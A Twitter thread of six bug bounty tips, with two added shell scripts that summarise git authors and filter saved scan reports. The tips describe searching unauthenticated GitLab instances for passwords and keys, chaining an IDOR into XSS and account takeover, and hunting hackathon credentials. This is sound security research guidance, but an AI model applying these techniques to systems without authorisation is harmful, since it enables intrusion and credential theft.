Abhishek Meena
Nov 4 10 tweets 4 min read
6 Bugbounty Tips from @EdOverflow
#infosec #bugbountytip

Thread 🧵(1/n) :👇 Bugbountytips
Tip #1 #bugbounty #infosec

Use Git as a recon tool. Find the target's Git repositories, clone them, and then check the logs for information on the team that is not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.
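
Seen from the maintainer's side, the same log review shows what a published repository discloses about who works on what. The sketch below is an added example, not part of the original thread: `authors_by_area` and `sample_log` are hypothetical names and the log is constructed. Against a real clone, pipe `git log --format='@%an <%ae>' --name-only` into the function.

```sh
#!/bin/sh
# Added example (not from the thread). Function names and sample data are
# hypothetical; the log below is constructed.

# authors_by_area: reads the output of
#   git log --format='@%an <%ae>' --name-only
# on stdin and prints "area<TAB>commits<TAB>author", where area is the
# top-level directory a commit touched. Assumes no path starts with "@".
authors_by_area() {
  awk '
    /^@/    { author = substr($0, 2); n++; next }   # one header per commit
    NF == 0 { next }                                # blank separator lines
    {
      slash = index($0, "/")
      area = (slash > 0) ? substr($0, 1, slash - 1) : "(root)"
      key = area "\t" author
      # count each commit once per area, however many files it touched there
      if (!((n, key) in seen)) { seen[n, key] = 1; count[key]++ }
    }
    END {
      for (k in count) {
        split(k, p, "\t")
        printf "%s\t%d\t%s\n", p[1], count[k], p[2]
      }
    }' | LC_ALL=C sort -t "$(printf '\t')" -k1,1 -k2,2nr -k3,3
}

# Constructed log in the format above (three commits, two authors).
sample_log() {
  printf '%s\n' \
    '@Alice Example <alice@corp.example.test>' '' \
    'api/auth.py' 'api/tokens.py' '' \
    '@Bob Example <bob@users.noreply.example.test>' '' \
    'api/auth.py' 'README.md' '' \
    '@Alice Example <alice@corp.example.test>' '' \
    'api/auth.py' 'infra/deploy.yml'
}

sample_log | authors_by_area
```
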
Tip #2
Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects.
Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.
Tip #3

Bug bounty tip: test a company's applications that cost money or require manual setup. Chances are few to none will have tested them, leaving them vulnerable.
Tip #4

If you’ve found an IDOR where you’re able to change the data of others, don’t jump out of your seat to report it. Modify it to an XSS payload, and if inputs are not sanitized and variables are echoed without being escaped, then IDOR > XSS > ATO.
Tip #5
Look for hackathon-related assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials.
I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.
Tip #6

Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less).
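
An added example (not from the original thread) of re-checking an archive of saved scan reports when a new advisory names a file. It assumes plain-text dirsearch reports with `<status> <size> <url>` lines stored as `<dir>/<host>/<scan>.txt`; `find_hits`, `make_sample_reports` and the hosts are constructed for illustration. Unlike the chained `grep`, it compares the status field exactly and matches the file name literally, so a `200B` size or a `.` wildcard cannot produce a false hit.

```sh
#!/bin/sh
# Added example. Assumes plain-text dirsearch reports whose result lines are
# "<status> <size> <url>", archived as <dir>/<host>/<scan>.txt.

# find_hits REPORT_DIR INDICATOR [STATUS]
# Prints "host<TAB>url<TAB>report" for archived results whose status field
# equals STATUS (default 200) and whose URL contains INDICATOR literally.
find_hits() {
  fh_dir="$1"; fh_ind="$2"; fh_status="${3:-200}"
  find "$fh_dir" -type f -exec awk -v want="$fh_status" -v ind="$fh_ind" '
    NF >= 3 && $1 == want && index($NF, ind) > 0 {
      host = $NF
      sub("^[a-z]+://", "", host)   # drop the scheme
      sub("[/:].*$", "", host)      # drop port and path
      printf "%s\t%s\t%s\n", host, $NF, FILENAME
    }' {} + | LC_ALL=C sort -u
}

# Constructed sample archive (not real scan data).
make_sample_reports() {
  ms_dir=$(mktemp -d) || return 1
  mkdir -p "$ms_dir/shop.example.test" "$ms_dir/blog.example.test"
  printf '%s\n' \
    '200    1KB  https://shop.example.test:443/INSTALL.mysql.txt' \
    '404     0B  https://shop.example.test:443/install.php' \
    > "$ms_dir/shop.example.test/scan1.txt"
  printf '%s\n' \
    '403   200B  https://blog.example.test/INSTALL.mysql.txt' \
    '200    2KB  https://blog.example.test/INSTALLxmysql.txt' \
    > "$ms_dir/blog.example.test/scan1.txt"
  printf '%s\n' "$ms_dir"
}

reports=$(make_sample_reports)
find_hits "$reports" "INSTALL.mysql.txt"   # only the shop.example.test line
rm -rf "$reports"
```
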
Hope you Like 👌this thread (🧵) on
6 Bugbounty Tips from @EdOverflow

here is ( Cheatsheet of it👇)

You can follow me for more like this

Join My Bugbountytips Group :😎
t.me/bugbountyresou…

